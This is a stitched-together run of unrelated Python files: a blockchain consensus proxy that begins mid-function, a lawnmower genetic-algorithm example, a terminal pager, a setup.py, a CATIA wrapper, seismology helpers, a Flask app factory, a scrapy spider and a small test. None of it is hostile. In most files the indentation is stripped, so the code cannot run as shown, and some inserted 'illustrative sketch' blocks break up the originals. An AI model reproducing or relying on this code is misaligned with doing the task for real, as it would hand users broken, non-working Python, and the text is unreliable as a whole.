True
"""
        if not self._consensus:
            LOGGER.debug("initialize_block: external consensus not registered\n")
            return False
# Using the current chain head, we need to create a state view so we
# can get our config values.
state_view = BlockWrapper.state_view_for_block(
self._block_cache.block_store.chain_head,
self._state_view_factory)
settings_view = SettingsView(state_view)
self._min_wait_time = settings_view.get_setting("bgx.consensus.min_wait_time", self._min_wait_time, float)
self._max_wait_time = settings_view.get_setting("bgx.consensus.max_wait_time", self._max_wait_time, float)
self._valid_block_publishers = settings_view.get_setting("bgx.consensus.valid_block_publishers",self._valid_block_publishers,list)
block_header.consensus = self._consensus # b"Devmode"
self._start_time = time.time()
self._wait_time = random.uniform(self._min_wait_time, self._max_wait_time)
LOGGER.debug("PROXY:initialize_block min_wait_time=%s max_wait_time=%s",self._min_wait_time,self._max_wait_time)
return True
def check_publish_block(self, block_header):
"""
Check if a candidate block is ready to be claimed.
For many peers we should control block's content .
If this peer is not owner of batch we must wait until all batches which were putted into block for peer owner of batch
will be putted into block for this peer too.
block_header (BlockHeader): the block_header to be checked if it
should be claimed
Returns:
Boolean: True if the candidate block_header should be claimed.
"""
if self._valid_block_publishers and block_header.signer_public_key not in self._valid_block_publishers:
return False
elif self._min_wait_time == 0:
return True
elif self._min_wait_time > 0 and self._max_wait_time <= 0:
if self._start_time + self._min_wait_time <= time.time():
return True
elif self._min_wait_time > 0 and self._max_wait_time > self._min_wait_time:
if self._start_time + self._wait_time <= time.time():
return True
else:
return False
def finalize_block_complete(self,consensus):
with self._condition:
self._is_finalize_complete = consensus
self._condition.notify()
def _finalize_complete(self):
return self._is_finalize_complete is not None
def finalize_block(self, block_header):
"""Finalize a block to be claimed. Provide any signatures and
data updates that need to be applied to the block before it is
signed and broadcast to the network.
Args:
block_header (BlockHeader): The candidate block that needs to be
finalized.
Returns:
True
"""
LOGGER.debug("PROXY:finalize_block inform external engine header=%s is_complete=%s",block_header.block_num,self._is_finalize_complete)
self._publisher.on_finalize_block(block_header)
self._is_finalize_complete = None
"""
after that consensus engine should be informed that block could be finalized and engine can say finalize for this candidate
FIXME - for DAG we can say for all ready candidate that his block's could be finalized and only after that wait engine's reply
"""
LOGGER.debug("PROXY:finalize_block wait proxy reply via finalize_block_complete...\n")
with self._condition:
return self._condition.wait_for(self._finalize_complete)
return True
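# Illustrative sketch (not part of the original module): the claim-readiness rule used by
# BlockPublisher.check_publish_block(), extracted as a pure function so the three
# configuration cases (no minimum, minimum only, min/max window) are easy to see and test.
def _example_claim_ready(now, start_time, min_wait_time, max_wait_time, wait_time):
    if min_wait_time == 0:
        return True
    if min_wait_time > 0 and max_wait_time <= 0:
        return start_time + min_wait_time <= now
    if min_wait_time > 0 and max_wait_time > min_wait_time:
        return start_time + wait_time <= now
    return False
# e.g. _example_claim_ready(now=10.0, start_time=9.97, min_wait_time=0.01, max_wait_time=0.06, wait_time=0.03) -> True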
class BlockVerifier(BlockVerifierInterface):
"""PROXY BlockVerifier implementation
"""
# pylint: disable=useless-super-delegation
def __init__(self,
block_cache,
state_view_factory,
data_dir,
config_dir,
validator_id):
super().__init__(
block_cache,
state_view_factory,
data_dir,
config_dir,
validator_id)
self._consensus = bytes(_CONSENSUS_NAME_, 'utf-8')
self._condition = Condition()
def verify_block_invalid(self,blkw):
# send message to external consensus
blk = blkw.get_block()
LOGGER.debug("PROXY:verify_block_invalid blk=%s\n",blk.header_signature[:8])
_consensus_notifier.notify_block_invalid(blk.header_signature)
def verify_block_complete(self,verify):
LOGGER.debug("PROXY:verify_block_complete %s",verify)
with self._condition:
self._is_verify_complete = verify
self._condition.notify()
def _verify_complete(self):
return self._is_verify_complete is not None
def verify_block(self, block_wrapper):
LOGGER.debug("PROXY:verify_block %s",self._consensus)
# send message new block
self._is_verify_complete = None
_consensus_notifier.notify_block_new(block_wrapper.get_block())
LOGGER.debug("PROXY:verify_block waiting consensus reply for BLOCK=%s.%s\n",block_wrapper.block_num,block_wrapper.identifier[:8])
with self._condition:
if self._condition.wait_for(self._verify_complete):
return self._is_verify_complete
return block_wrapper.header.consensus == self._consensus
class ForkResolver(ForkResolverInterface):
"""Provides the fork resolution interface for the BlockValidator to use
when deciding between 2 forks.
"""
# pylint: disable=useless-super-delegation
def __init__(self,
block_cache,
state_view_factory,
data_dir,
config_dir,
validator_id):
super().__init__(
block_cache,
state_view_factory,
data_dir,
config_dir,
validator_id)
self._consensus = bytes(_CONSENSUS_NAME_, 'utf-8')
self._condition = Condition()
@staticmethod
def hash_signer_public_key(signer_public_key, header_signature):
m = hashlib.sha256()
m.update(signer_public_key.encode())
m.update(header_signature.encode())
digest = m.hexdigest()
number = int(digest, 16)
return number
def _compare_forks_complete(self):
return self._is_compare_forks is not None
def compare_forks_complete(self,result):
LOGGER.debug("PROXY:compare_forks_complete result=%s",result)
with self._condition:
self._is_compare_forks = result
self._condition.notify()
def compare_forks(self, cur_fork_head, new_fork_head):
"""The longest chain is selected. If they are equal, then the hash
value of the previous block id and publisher signature is computed.
The lowest result value is the winning block.
Args:
cur_fork_head: The current head of the block chain.
new_fork_head: The head of the fork that is being evaluated.
Returns:
bool: True if choosing the new chain head, False if choosing
the current chain head.
"""
LOGGER.debug("PROXY:compare_forks cur~new=%s~%s new fork consensus=%s~%s",cur_fork_head.identifier[:8],new_fork_head.identifier[:8],new_fork_head.consensus,self._consensus)
# If the new fork head is not DevMode consensus, bail out. This should
# never happen, but we need to protect against it.
if new_fork_head.consensus != self._consensus and new_fork_head.consensus != b"Genesis":
raise TypeError('New fork head {} is not a {} block'.format(new_fork_head.identifier[:8],_CONSENSUS_NAME_))
self._is_compare_forks = None
_consensus_notifier.notify_block_valid(new_fork_head.identifier)
LOGGER.debug("PROXY:compare_forks waiting consensus reply for new head=%s\n",new_fork_head.identifier[:8])
with self._condition:
if self._condition.wait_for(self._compare_forks_complete) :
if self._is_compare_forks:
# send message to external consensus
_consensus_notifier.notify_block_commit(new_fork_head.identifier)
return self._is_compare_forks
# If the current fork head is not DevMode consensus, check the new fork
# head to see if its immediate predecessor is the current fork head. If
# so that means that consensus mode is changing. If not, we are again
# in a situation that should never happen, but we need to guard
# against.
"""
if cur_fork_head.consensus != self._consensus:
if new_fork_head.previous_block_id == cur_fork_head.identifier:
LOGGER.info('Choose new fork {}: New fork head switches consensus to {}'.format(new_fork_head.identifier[:8],_CONSENSUS_NAME_))
return True
raise \
TypeError(
'Trying to compare a {} block {} to a non-{} '
'block {} that is not the direct predecessor'.format(
_CONSENSUS_NAME_,
new_fork_head.identifier[:8],
_CONSENSUS_NAME_,
cur_fork_head.identifier[:8]))
if new_fork_head.block_num == cur_fork_head.block_num:
cur_fork_hash = self.hash_signer_public_key(
cur_fork_head.header.signer_public_key,
cur_fork_head.header.previous_block_id)
new_fork_hash = self.hash_signer_public_key(
new_fork_head.header.signer_public_key,
new_fork_head.header.previous_block_id)
result = new_fork_hash < cur_fork_hash
else:
result = new_fork_head.block_num > cur_fork_head.block_num
return result
"""
|
# File: lawnmower.py
# from chapter 15 of _Genetic Algorithms with Python_
#
# Author: Clinton Sheppard <fluentcoder@gmail.com>
# Copyright (c) 2016 Clinton Sheppard
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
from enum import Enum
class FieldContents(Enum):
Grass = ' #'
Mowed = ' .'
Mower = 'M'
def __str__(self):
return self.value
class Direction:
def __init__(self, index, xOffset, yOffset, symbol):
self.Index = index
self.XOffset = xOffset
self.YOffset = yOffset
self.Symbol = symbol
def move_from(self, location, distance=1):
return Location(location.X + distance * self.XOffset,
location.Y + distance * self.YOffset)
class Directions(Enum):
North = Direction(0, 0, -1, '^')
East = Direction(1, 1, 0, '>')
South = Direction(2, 0, 1, 'v')
West = Direction(3, -1, 0, '<')
@staticmethod
def get_direction_after_turn_left_90_degrees(direction):
newIndex = direction.Index - 1 \
if direction.Index > 0 \
else len(Directions) - 1
newDirection = next(i for i in Directions
if i.value.Index == newIndex)
return newDirection.value
@staticmethod
def get_direction_after_turn_right_90_degrees(direction):
newIndex = direction.Index + 1 \
if direction.Index < len(Directions) - 1 \
else 0
newDirection = next(i for i in Directions
if i.value.Index == newIndex)
return newDirection.value
class Location:
def __init__(self, x, y):
self.X, self.Y = x, y
def move(self, xOffset, yOffset):
return Location(self.X + xOffset,
self.Y + yOffset)
class Mower:
def __init__(self, location, direction):
self.Location = location
self.Direction = direction
self.StepCount = 0
def turn_left(self):
self.StepCount += 1
self.Direction = Directions\
.get_direction_after_turn_left_90_degrees(self.Direction)
def mow(self, field):
newLocation = self.Direction.move_from(self.Location)
newLocation, isValid = field.fix_location(newLocation)
if isValid:
self.Location = newLocation
self.StepCount += 1
field.set(self.Location, self.StepCount
if self.StepCount > 9
else " {}".format(self.StepCount))
def jump(self, field, forward, right):
newLocation = self.Direction.move_from(self.Location, forward)
rightDirection = Directions\
.get_direction_after_turn_right_90_degrees(self.Direction)
newLocation = rightDirection.move_from(newLocation, right)
newLocation, isValid = field.fix_location(newLocation)
if isValid:
self.Location = newLocation
self.StepCount += 1
field.set(self.Location, self.StepCount
if self.StepCount > 9
else " {}".format(self.StepCount))
class Field:
def __init__(self, width, height, initialContent):
self.Field = [[initialContent] * width for _ in range(height)]
self.Width = width
self.Height = height
def set(self, location, symbol):
self.Field[location.Y][location.X] = symbol
def count_mowed(self):
return sum(1 for row in range(self.Height)
for column in range(self.Width)
if self.Field[row][column] != FieldContents.Grass)
def display(self, mower):
for rowIndex in range(self.Height):
if rowIndex != mower.Location.Y:
row = ' '.join(map(str, self.Field[rowIndex]))
else:
r = self.Field[rowIndex][:]
r[mower.Location.X] = "{}{}".format(
FieldContents.Mower, mower.Direction.Symbol)
row = ' '.join(map(str, r))
print(row)
class ValidatingField(Field):
def __init__(self, width, height, initialContent):
super().__init__(width, height, initialContent)
def fix_location(self, location):
if location.X >= self.Width or \
location.X < 0 or \
location.Y >= self.Height or \
location.Y < 0:
return None, False
return location, True
class ToroidField(Field):
def __init__(self, width, height, initialContent):
super().__init__(width, height, initialContent)
def fix_location(self, location):
newLocation = Location(location.X, location.Y)
if newLocation.X < 0:
newLocation.X += self.Width
elif newLocation.X >= self.Width:
newLocation.X %= self.Width
if newLocation.Y < 0:
newLocation.Y += self.Height
elif newLocation.Y >= self.Height:
newLocation.Y %= self.Height
return newLocation, True
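# Illustrative usage sketch (not part of the original file): mow a small toroidal field and
# print the grid of step numbers the mower leaves behind. Field size and moves are arbitrary.
if __name__ == '__main__':
    field = ToroidField(8, 4, FieldContents.Grass)
    mower = Mower(Location(0, 0), Directions.South.value)
    for _ in range(8):
        mower.mow(field)   # head south, wrapping around the bottom edge
    mower.turn_left()
    for _ in range(3):
        mower.mow(field)   # continue along the new direction
    field.display(mower)
    print("mowed squares:", field.count_mowed())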
|
import sys
from . import more_plugins
from .buffered_input import BufferedInput
from .page_builder import PageBuilder, StopOutput
from .page_of_height import PageOfHeight
from .page_wrapper import PageWrapper
from .terminal_input import TerminalInput
from .terminal_screen import TerminalScreen
def MorePageBuilder(*args, **kwargs):
'''
    A PageBuilder that is intended to closely mirror the way 'more' works.
It supports the basic 'more' actions (one-more-page, n-more-lines, find-text).
Extra actions can be installed as plugins, see more_plugins.py
Constructor Arguments:
----------------------
input: [type Input]
If not specified we read input from stdin
output: [type Output]
If not specified we print output to stdout
screen_dimensions: [type ScreenDimensions]
If not specified we use the dimensions of the terminal window
plugins: [type list of MorePlugin]
        The plugins to load. If not specified, all plugins from more_plugins.py are loaded.
'''
return PageWrapper(_MorePageBuilder(*args, **kwargs))
class _MorePageBuilder(PageBuilder):
def __init__(self, input=None, output=None, screen_dimensions=None, plugins=None):
self._screen_dimensions = screen_dimensions or TerminalScreen()
self._output = output or sys.stdout
self._input = BufferedInput(input or TerminalInput())
self._plugins = plugins or more_plugins.get()
self._action_handlers = _build_plugins_dictionary(self._plugins)
def build_first_page(self):
return PageOfHeight(height=self.get_page_height(), output=self._output)
def build_next_page(self, message=None, arguments=None):
try:
return self._try_to_build_next_page(
message or self.get_prompt_message(),
arguments or {}
)
except KeyboardInterrupt:
# Stop output on ctrl-c
raise StopOutput
def _try_to_build_next_page(self, message, arguments):
while True:
key_pressed = self._input.get_character(message)
if key_pressed in self._action_handlers:
handler = self._action_handlers[key_pressed]
return handler.build_page(self, key_pressed=key_pressed, arguments=arguments)
def get_plugins(self):
return self._plugins
def get_page_height(self):
height_reserved_for_more_prompt = 1
return self._screen_dimensions.get_height() - height_reserved_for_more_prompt
def get_output(self):
return self._output
def get_input(self):
''' Returns the BufferedInput object used to get the user input '''
return self._input
def get_prompt_message(self):
return '--More--'
def _build_plugins_dictionary(plugins):
return {
key: plugin
for plugin in plugins
for key in plugin.get_keys()
}
|
import random
def compute_gems(points, num_gems):
gems = []
# For each requested gem, fetch a pair of adjacent points from points list and place a gem randomly between them
start_indices = random.sample(range(0, len(points)-1), int(num_gems))
start_indices.sort() # Ensure all gems are in strictly increasing position along the path
for start_index in start_indices:
# Find two points between which to place the gem
start = points[start_index]
finish = points[start_index+1]
# Pick the point of the gem
lat_diff = finish['lat'] - start['lat']
lng_diff = finish['lng'] - start['lng']
interspace_position = random.random() # Pick the gem position 0-1, 0 being start and 1 being finish
gem_pos = {
'lat': start['lat'] + lat_diff * interspace_position,
'lng': start['lng'] + lng_diff * interspace_position
}
# Add gem to the gems list
gems.append(gem_pos)
return gems
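# Illustrative usage sketch (not part of the original module): place two gems along a short
# three-point path and print their interpolated coordinates. The coordinates are placeholders.
if __name__ == '__main__':
    path = [
        {'lat': 51.500, 'lng': -0.120},
        {'lat': 51.505, 'lng': -0.115},
        {'lat': 51.510, 'lng': -0.110},
    ]
    for gem in compute_gems(path, 2):
        print(gem)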
|
from setuptools import setup, find_packages
# from setuptools.command.install import install as _install
#
#
# class Install(_install):
# def run(self):
# _install.do_egg_install(self)
# import nltk
# nltk.download('stopwords')
# nltk.download('punkt')
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setup(
# cmdclass={'install': Install},
name="text-based-clusterer",
version="0.0.2",
author="Benedict Taguinod",
author_email="benedict.a.taguinod@gmail.com",
description="A package that clusters python objects based on a chosen string attribute",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/btaguinod/text-based-clusterer",
project_urls={
"Bug Tracker": "https://github.com/btaguinod/text-based-clusterer/issues",
},
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
package_dir={"": "src"},
packages=find_packages(where="src"),
python_requires=">=3.6",
install_requires=['numpy', 'nltk'],
)
|
#! usr/bin/python3.6
"""
Module initially auto generated using V5Automation files from CATIA V5 R28 on 2020-07-06 14:02:20.222384
.. warning::
The notes denoted "CAA V5 Visual Basic Help" are to be used as reference only.
They are there as a guide as to how the visual basic / catscript functions work
and thus help debugging in pycatia.
"""
from pycatia.in_interfaces.reference import Reference
from pycatia.mec_mod_interfaces.hybrid_shape import HybridShape
class HybridShapeWrapSurface(HybridShape):
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| System.IUnknown
| System.IDispatch
| System.CATBaseUnknown
| System.CATBaseDispatch
| System.AnyObject
| MecModInterfaces.HybridShape
| HybridShapeWrapSurface
|
| Represents the hybrid shape wrap surface object.
| Role: To access the data of the hybrid shape wrap surface
| object.
|
| This data includes:
|
                | Two definition surfaces (reference and target), which define the
| deformation
|
| Use the CATIAHybridShapeFactory to create a HybridShapeWrapSurface
| object.
|
| See also:
| HybridShapeFactory
"""
def __init__(self, com_object):
super().__init__(com_object)
self.hybrid_shape_wrap_surface = com_object
@property
def deformation_mode(self) -> int:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| o Property DeformationMode() As long
|
| Returns or sets whether the wrap surface is or should be created as
| a"Normal" or with a "3D" deformation mode.
| Legal values: 2 for the normal solution and 1 for 3D
| solution.
|
| Example:
|
| This example sets the mode to create the wrap
| surface
| hybWrapSurface with a 3D deformation mode.
|
|
| hybWrapSurface.3D deformation mode = 1
:return: int
:rtype: int
"""
return self.hybrid_shape_wrap_surface.DeformationMode
@deformation_mode.setter
def deformation_mode(self, value: int):
"""
:param int value:
"""
self.hybrid_shape_wrap_surface.DeformationMode = value
@property
def reference_surface(self) -> Reference:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| o Property ReferenceSurface() As Reference
|
| Returns or sets the reference surface of the WrapSurface.
|
| Example:
| This example retrieves in ReferenceSurface the surface to deform of the
| ShpWrapSurface hybrid shape WrapSurface feature.
|
| ReferenceSurface = ShpWrapSurface.Surface
:return: Reference
:rtype: Reference
"""
return Reference(self.hybrid_shape_wrap_surface.ReferenceSurface)
@reference_surface.setter
def reference_surface(self, reference_surface: Reference):
"""
:param Reference reference_surface:
"""
self.hybrid_shape_wrap_surface.ReferenceSurface = reference_surface.com_object
@property
def surface(self) -> Reference:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| o Property Surface() As Reference
|
| Returns or sets the reference surface to deform of the WrapSurface.
|
|
| Example:
| This example retrieves in SurfaceToDeform the surface to deform of the
| ShpWrapSurface hybrid shape WrapSurface feature.
|
| SurfaceToDeform = ShpWrapSurface.Surface
:return: Reference
:rtype: Reference
"""
return Reference(self.hybrid_shape_wrap_surface.Surface)
@surface.setter
def surface(self, reference_surface: Reference):
"""
:param Reference reference_surface:
"""
self.hybrid_shape_wrap_surface.Surface = reference_surface.com_object
@property
def target_surface(self) -> Reference:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| o Property TargetSurface() As Reference
|
| Returns or sets the target surface of the WrapSurface.
|
| Example:
| This example retrieves in TargetSurface the surface to deform of the
| ShpWrapSurface hybrid shape WrapSurface feature.
|
| TargetSurface = ShpWrapSurface.Surface
:return: Reference
:rtype: Reference
"""
return Reference(self.hybrid_shape_wrap_surface.TargetSurface)
@target_surface.setter
def target_surface(self, reference_surface: Reference):
"""
:param Reference reference_surface:
"""
self.hybrid_shape_wrap_surface.TargetSurface = reference_surface.com_object
def __repr__(self):
return f'HybridShapeWrapSurface(name="{self.name}")'
|
#Area of Triangle
#Asking for Breadth(b) and Height(h) of triangle.
b = float(input("Enter the breadth of the triangle = "))
h = float(input("Enter the height of the triangle = "))
print('Area of triangle =', h * b / 2, 'square units')
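# A small reusable variant of the same formula (not part of the original snippet),
# convenient for testing without interactive input:
def triangle_area(breadth, height):
    """Return the area of a triangle from its base (breadth) and height."""
    return breadth * height / 2
# e.g. triangle_area(4, 3) == 6.0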
|
import random
import time
import snakefish
channel = snakefish.Channel() # create a channel
# a function that will be executed on a snakefish thread
def f1() -> None:
if random.random() < 0.5:
print("thread #1: sleep for 100 ms")
time.sleep(0.1)
ts = snakefish.get_timestamp_serialized()
print("thread #1: sending an event...")
channel.send_pyobj((ts, "explosion"))
# a function that will be executed on a snakefish thread
def f2() -> None:
ts = snakefish.get_timestamp_serialized()
print("thread #2: sending an event...")
channel.send_pyobj((ts, "implosion"))
# a function that will be executed on a snakefish thread
def f3() -> None:
# blocking receive
print("thread #3: receiving an object...")
received1 = channel.receive_pyobj(True)
# blocking receive
print("thread #3: receiving an object...")
received2 = channel.receive_pyobj(True)
print("thread #3: timestamps are %s and %s" % (received1[0], received2[0]))
if received1[0] <= received2[0]:
print("thread #3: %s occurred before %s" % (received1[1], received2[1]))
else:
print("thread #3: %s occurred before %s" % (received2[1], received1[1]))
# spawn 3 snakefish threads
t1 = snakefish.Thread(f1)
t2 = snakefish.Thread(f2)
t3 = snakefish.Thread(f3)
t1.start()
t2.start()
t3.start()
# join the threads and check exit status
t1.join()
assert (t1.get_exit_status() == 0)
print("thread #1 exit status:", t1.get_exit_status())
print("result of f1():", t1.get_result())
t2.join()
assert (t2.get_exit_status() == 0)
print("thread #2 exit status:", t2.get_exit_status())
print("result of f2():", t2.get_result())
t3.join()
assert (t3.get_exit_status() == 0)
print("thread #3 exit status:", t3.get_exit_status())
print("result of f3():", t3.get_result())
# release resources
channel.dispose()
t1.dispose()
t2.dispose()
t3.dispose()
|
# fill this in with the common functions so i can clean up my shitty code
import json
import pandas as pd
import datetime
import math
from pathlib import Path
import numpy as np
def csv_naive_filter(csv_path, list_of_timestamps):
df = pd.read_csv(csv_path)
df["event_ts"] = pd.to_datetime(df["event_start_time"])
for index, row in df.iterrows():
df.at[index, "keep"] = "{}.{}".format(row["station"], datetime.datetime.strftime(row["event_ts"], "%Y.%j.%H%M%S")) in list_of_timestamps
df = df[df.keep == True]
return df
def csv_indexed_filter(csv_path, list_of_timestamps):
df = pd.read_csv(csv_path)
df["event_ts"] = pd.to_datetime(df["event_start_time"])
for index, row in df.iterrows():
test_str = "{}.{}".format(row["station"], datetime.datetime.strftime(row["event_ts"], "%Y.%j.%H%M%S"))
df.at[index, "keep"] = test_str in list_of_timestamps
        try:
            _manualindex = int(list_of_timestamps.index(test_str))
            df.at[index, "input_index"] = _manualindex
        except ValueError:
            df.at[index, "input_index"] = None
df = df[df.keep == True]
return df
def centre_bin(bins):
return (bins[1:] + bins[:-1])/2
def match_gradings(df, grade_tracename, grades):
"""
Given a txt file in manual (giving the grades for each trace as identified in its file name),
and a data file, match each grade to the waveform in the pd df
:param df: filtered pandas dataframe
:type df: { type_description }
:param grade_tracename: A list of grades and tracenames, taken from the manual folder
:type grade_tracename: { type_description }
:param grades: The grades
:type grades: { type_description }
"""
for c, tn in enumerate(grade_tracename):
tn = ".".join(tn.split(".")[1:])
_dfindex = df[df.ts_str == tn].index.values[0]
df.at[_dfindex, "grade"] = grades[c].upper()
return df
def load_graded_from_file_structure(sac_folder, csv_file):
# returns matched df (with the file structure) + puts their grade there
grades = []
filenames = []
for p in Path(sac_folder).rglob("*png"):
_p = str(p)
_grade = _p.split("/")[-2]
grades.append(_grade)
filenames.append(".".join(_p.split("/")[-1].split(".")[:-1])) # get the filename without the extension
# there is defn a better way to do this
#print(filenames)
df = csv_indexed_filter(csv_file, filenames)
for index, row in df.iterrows():
df.at[index, "grade"] = grades[int(row["input_index"])]
return df
def load_from_grades(known_picks):
"""
    returns a tuple of (a list of tracenames (the timestamp), and the grades).
    this should be deprecated in favour of reading directly from the sac_picks folder as a source of picks
:param known_picks: The known picks
:type known_picks: { type_description }
"""
graded_traces = []
grades = []
with open(known_picks, "r") as f:
for line in f:
_x = line.strip().split(",")
graded_traces.append(_x[0])
grades.append(_x[1])
return (graded_traces, grades)
def load_with_path_and_grade(csv_file, source_folder):
sac_pathname = [str(path) for path in Path(source_folder).rglob('*.png')]
sac_tracename = [x.split("/")[-1].split(".png")[0] for x in sac_pathname]
folder_df = pd.DataFrame(np.column_stack([sac_pathname, sac_tracename]), columns = ["pathname", "wf"])
for index, row in folder_df.iterrows():
folder_df.at[index, 'grade'] = row.pathname.split("/")[-2]
# load the csv file, make a new column for file name, do pd.merge to match the two of the
csv_df = pd.read_csv(csv_file)
csv_df['event_dt'] = pd.to_datetime(csv_df.event_start_time)
for index, row in csv_df.iterrows():
csv_df.at[index, 'wf'] = "{}.{}".format(row.station, datetime.datetime.strftime(row.event_dt, "%Y.%j.%H%M%S"))
#print(csv_df)
new_df = csv_df.merge(folder_df, on = "wf")
return new_df
def parse_xy_lines(input_file):
all_lines = []
b_c = 0 # bracket counter
_line = []
with open(input_file, 'r') as f:
for line in f:
if ">" in line.strip():
b_c += 1
if len(_line) > 0:
all_lines.append(_line)
_line = []
continue
if b_c % 2:
#print(line.strip().split(" "))
                try:
                    _lon, _lat = line.strip().split(" ")
                except ValueError:
                    _lon, _lat = line.strip().split("\t")
_line.append((float(_lon), float(_lat)))
return all_lines
def parse_station_info(input_file):
# 'reusing functions is bad practice' yes haha
station_info = {}
with open(input_file, 'r') as f:
for line in f:
#print(line)
try:
data = [x for x in line.strip().split("\t") if x != ""]
except:
data = [x for x in line.strip().split(" ") if x != ""]
sta = data[0]
lon = data[1]
lat = data[2]
station_info[sta] = {"lon": float(lon), "lat": float(lat)}
if len(data) == 4:
elv = data[3]
station_info[sta]["elv"] = float(elv)
return station_info
def parse_event_coord(file_name, _format):
event_info = {}
# uid : {"lon", "lat", "depth"}
if _format == "real_hypophase":
with open(file_name, 'r') as f:
for line in f:
line = [x for x in line.strip().split(" ") if x != ""]
if line[0] == "#":
#print(line)
_lon = float(line[8])
_lat = float(line[7])
_depth = float(line[9])
_id = (line[-1])
event_info[_id] = {
"lat": _lat,
"lon": _lon,
"dep": _depth
}
elif _format == "hypoDD_loc": # any .loc or .reloc file
with open(file_name, 'r') as f:
for line in f:
line = [x for x in line.strip().split(" ") if x != ""]
_id = str(line[0]).zfill(6)
event_info[_id] = {
"lat":float(line[1]),
"lon":float(line[2]),
"dep":float(line[3])
}
elif _format == "event_csv":
df = pd.read_csv(file_name)
for index, row in df.iterrows():
for _i in ["ID", "id", "cat_index"]:
if _i in df.columns:
_id = str(int(row[_i])).zfill(6)
event_info[_id] = {}
break
for _i in ["lat", "LAT", "event_lat", "ev_lat"]:
if _i in df.columns:
event_info[_id]["lat"] = row[_i]
break
for _i in ["lon", "LON", "event_lon", "ev_lon"]:
if _i in df.columns:
event_info[_id]["lon"] = row[_i]
break
for _i in ["DEPTH", "depth", "dep", "DEP", "event_depth", "event_dep"]:
if _i in df.columns:
event_info[_id]["dep"] = row[_i]
break
else:
raise ValueError("Format {} not supported, please consult the wiki".format(_format))
return event_info
def split_csv(input_csv, output_csv_root, N = 4):
    # Split input_csv into N roughly equal parts named <output_csv_root>_0.csv ... <output_csv_root>_{N-1}.csv
    df = pd.read_csv(input_csv)
    n_rows_per_file = math.ceil(len(df) / N)
    for i in range(N):
        chunk = df.iloc[i * n_rows_per_file:(i + 1) * n_rows_per_file]
        chunk.to_csv("{}_{}.csv".format(output_csv_root, i), index=False)
if __name__ == "__main__":
pass
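    # Illustrative sketch (not part of the original module): exercise parse_station_info()
    # on a tiny tab-separated station list written to a temporary file. The station names
    # and coordinates below are placeholders.
    import tempfile
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as tmp:
        tmp.write("STA1\t103.82\t1.35\t50.0\n")
        tmp.write("STA2\t103.90\t1.40\n")
        station_file = tmp.name
    print(parse_station_info(station_file))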
|
# -*- coding: utf-8 -*-
import os
from flask import Flask, render_template
from flask_cors import CORS
from polylogyx.api.api import blueprint as api
from polylogyx.celery.tasks import celery
from polylogyx.extensions import (
cache,
csrf,
db,
log_tee,
mail,
make_celery,
migrate,
rule_manager,
threat_intel
)
from polylogyx.settings import ProdConfig
def create_app(config=ProdConfig):
app = Flask(__name__)
CORS(app)
app.config.from_object(config)
app.config.from_envvar("POLYLOGYX_SETTINGS", silent=True)
register_blueprints(app)
register_loggers(app)
register_extensions(app)
return app
def register_blueprints(app):
app.register_blueprint(api)
csrf.exempt(api)
def register_extensions(app):
csrf.init_app(app)
db.init_app(app)
migrate.init_app(app, db)
log_tee.init_app(app)
rule_manager.init_app(app)
threat_intel.init_app(app)
mail.init_app(app)
make_celery(app, celery)
cache.init_app(app)
def register_loggers(app):
import logging
import sys
from logging.handlers import RotatingFileHandler,TimedRotatingFileHandler
import pathlib
from datetime import datetime
logfile = app.config["POLYLOGYX_LOGGING_FILENAME"]
if logfile == "-":
handler = logging.StreamHandler(sys.stdout)
else:
log_dir = pathlib.Path(app.config['POLYLOGYX_LOGGING_DIR'])
logfile = log_dir.joinpath(logfile)
max_size = app.config["POLYLOGYX_LOGFILE_SIZE"]
backup_cnt = app.config["POLYLOGYX_LOGFILE_BACKUP_COUNT"]
handler = RotatingFileHandler(logfile, maxBytes=max_size, backupCount=backup_cnt)
#handler = TimedRotatingFileHandler(logfile,"midnight",1,10,'utf-8')
namer = lambda fn : str(fn).split(".")[0]+"_"+ datetime.now().strftime("%Y-%m-%d_%H-%M")
handler.namer=namer
level_name = app.config["POLYLOGYX_LOGGING_LEVEL"]
if level_name in ("DEBUG", "INFO", "WARN", "WARNING", "ERROR", "CRITICAL"):
app.logger.setLevel(getattr(logging, level_name))
formatter = logging.Formatter(app.config["POLYLOGYX_LOGGING_FORMAT"])
handler.setFormatter(formatter)
app.logger.addHandler(handler)
|
import scrapy
class DocSectionItem(scrapy.Item):
title = scrapy.Field()
company = scrapy.Field()
location = scrapy.Field()
class MySpider(scrapy.Spider):
name = 'myspider'
start_urls = ['https://stackoverflow.com/jobs?med=site-ui&ref=jobs-tab']
def parse(self, response):
for a_el in response.css('div#mainbar div.listResults div.-job-summary'):
section = DocSectionItem()
section['title'] = a_el.css('div.-title a::text').extract()[0]
section['company'] = a_el.css('span:not(.fc-black-500)::text').extract()[2].strip().replace('\r\n','')
section['location'] = a_el.css('span.fc-black-500::text').extract()[1].strip().replace('- \r\n','')
yield section
        next_page = response.css('div#mainbar div.pagination a.prev-next.job-link.test-pagination-next::attr(href)').extract_first()
        if next_page is not None:
            next_page = response.urljoin(next_page)
            yield scrapy.Request(next_page, callback = self.parse)
|
from copy import deepcopy
from json import dumps, loads
def test_ffflash_save(tmpdir, fffake):
apifile = tmpdir.join('phony_api_file.json')
apifile.write_text(dumps({'a': 'b'}), 'utf-8')
assert tmpdir.listdir() == [apifile]
f = fffake(apifile, dry=True)
assert f
assert f.args.APIfile == str(apifile)
assert f.location == str(apifile)
assert f.api is not None
old_c = deepcopy(f.api.c)
assert f.api.push('c', 'a') is None
assert loads(f.save()) == f.api.c
assert f.api.c != old_c
